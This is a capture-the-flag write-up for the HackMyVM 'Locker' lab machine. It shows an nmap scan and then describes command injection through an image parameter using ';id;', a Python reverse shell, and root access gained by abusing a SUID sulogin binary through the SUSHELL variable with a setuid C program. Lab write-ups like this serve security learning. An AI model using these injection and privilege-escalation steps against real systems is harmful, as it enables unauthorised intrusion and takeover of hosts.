2.6 KiB
HackMyVM-Locker
NMAP
nmap -p- -sC -sV 192.168.1.140
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 15:48 PKT
Nmap scan report for 192.168.1.140
Host is up (0.00013s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:6A:15:D5 (Oracle VirtualBox virtual NIC)
PORT 80
On clicking the hyperlink
We can see an image of the lock also we can the parameter image having value of 1 so let's changing the value
We have 3 images , I tried running gobuster there wasn't anything intersting also I tried steghide, strings,exiftool on these images but didn't get anything useful
So I had no idea what to do at this point than thought about the obivous RCE
But got nothing.After asking for hints on discord looking at the screen for quite a while I just added ;id; and got rce to be working
To get a reverse shell we will use python payload adding the payload after ;
Transfer linpeas for further enumeration although it isn't necessary but if you want to just enumerate faster you should run the script it's very helpful
Here we can see /usr/sbin/sulogin which is not commonly set as SUID
Seeing the man page of sulogin
sulogin looks for the environment variable SUSHELL or sushell to determine what shell to start.If the environment variable is not set,it will try to execute root's shell from /etc/passwd.If that fails,it will fall back to /bin/sh.
Create c program to set uid and gid to 0 and execute /bin/bash using system
Compile and transfer it to the target machine
As it said in the man page of sulogin that it will look for SUSHELL variable and will start it so we need to exit from sulogin and then run the command again
